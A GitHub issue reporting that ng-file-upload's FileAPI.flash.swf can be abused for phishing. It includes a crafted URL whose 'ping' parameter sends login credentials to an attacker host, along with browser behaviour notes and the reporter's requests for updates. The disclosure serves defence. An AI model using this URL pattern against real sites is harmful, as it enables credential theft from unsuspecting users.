search

danialfarid / ng-file-upload

Lightweight Angular directive to upload files with optional FileAPI shim for cross browser support
MIT License
7.87k stars 1.6k forks source link

FileAPI.flash.swf can be used for phishing attacks #2100

Open kaushikpatidar opened 5 years ago

kaushikpatidar commented 5 years ago

This file is vulnerable to an attack, where the attacker can send the victim to this URL:

https://my.website.com/**/**/**/**/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site

And that will prompt the user to enter their login details, but the login details are actually being sent to the attacker's website (authorization.site) instead of my website.

Firefox warns the user that the data will be sent to another site. image

Safari will prompt the credentials with message: image

Because it can be used by an unauthenticated attacker to attack any legitimate user, and since the url the victim sees is the one for the legitimate use case, it might be easier to phish

https://**my.website.com**/##/##/##/##/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site

kaushikpatidar commented 5 years ago

Any updates on this?

kaushikpatidar commented 5 years ago

Any updates on this yet?